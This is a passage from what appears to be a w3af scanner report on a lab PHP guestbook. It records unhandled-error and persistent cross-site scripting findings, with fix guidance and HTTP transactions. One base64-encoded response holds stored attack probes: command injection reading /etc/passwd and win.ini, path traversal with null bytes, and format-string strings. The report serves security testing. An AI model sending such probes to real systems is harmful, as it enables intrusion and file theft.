        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="257">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="290">
                <http-request>
                    <status>GET http://10.12.68.43:31337/SgbxOvuY HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="316">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[257, 290, 357]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="257">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="290">
                <http-request>
                    <status>GET http://10.12.68.43:31337/SgbxOvuY HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="357">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[778, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://10.12.68.43:31337/post" var="pseudo">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;ujkeo&lt;/-&gt;&quot; to the &quot;pseudo&quot; parameter at http://10.12.68.43:31337/post, which is echoed when browsing to http://10.12.68.43:31337/.</description>
        <long-description>Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. 

 Cross Site Scripting (XSS) allows clients to inject arbitrary scripting code into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or encoding. 

 Persistent Cross Site Scripting vulnerabilities occur when the application stores user controlled information and then uses it to render HTTP response bodies to other clients. 

 This type of vulnerability can be used by a cyber-criminal to perform session hijacking, phishing or denial of service attacks against other web application users.</long-description>
        <fix-guidance>To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. 

 Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: 

 * `&amp;`
 * `&lt;`
 * `&gt;`
 * `&quot;`
 * `'`
 * `/`
 

 An example of HTML entity encoding is converting `&lt;` to `&amp;lt;`. Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: 

 1. Directly in a script.
 2. Inside an HTML comment.
 3. In an attribute name.
 4. In a tag name.
 5. Directly in CSS.
 

 Each of these locations have their own form of escaping and filtering. 

 _Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._</fix-guidance>
        <fix-effort>10</fix-effort>
        <references>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting"/>
            <reference title="Secunia" url="http://secunia.com/advisories/9716/"/>
            <reference title="ha.ckers" url="http://ha.ckers.org/xss.html"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet"/>
        </references>
        <http-transactions>
            <http-transaction id="778">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="44" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz11amtlbyUzQyUyRi0lM0U=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1175">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0ZShu
ZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmcoImxw
anFpIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNz
d2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4m
Ji9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09UJXdp
bi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
Pnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZU1RF
TVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmluL2Nh
dCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUgJVNZ
U1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3aW4u
aW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjE5NTQ4Nzg1PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9w
YXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vZXRj
L3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+QzoIb290
LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3Qu
aW5pAC5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkM6CG9vdC5pbmkALmh0bWw8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+OTQwNzM0MzE8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD4lU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkA
Lmh0bWw8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaQAuaHRtbDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cGluZyAtbiA0IGxvY2FsaG9zdDwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5hKS8p
LykvKS8pLykvKS8pLykvKS8pLykvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmEpLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLzwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD4yQ25MT2YyRTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5oVHRwOi8vdzNh
Zi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmhUdHA6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+aHRUcHM6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aHRUcHM6
Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+ZlRwOi8vdzNhZi5vcmcv
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPmZUcDovL3czYWYub3JnLzwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD4lbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lbjwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4lbiVuJW4lbjwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4lbiVuJW4lbjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+XigjJCFAIyQp
KCgpKSkqKioqKio8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
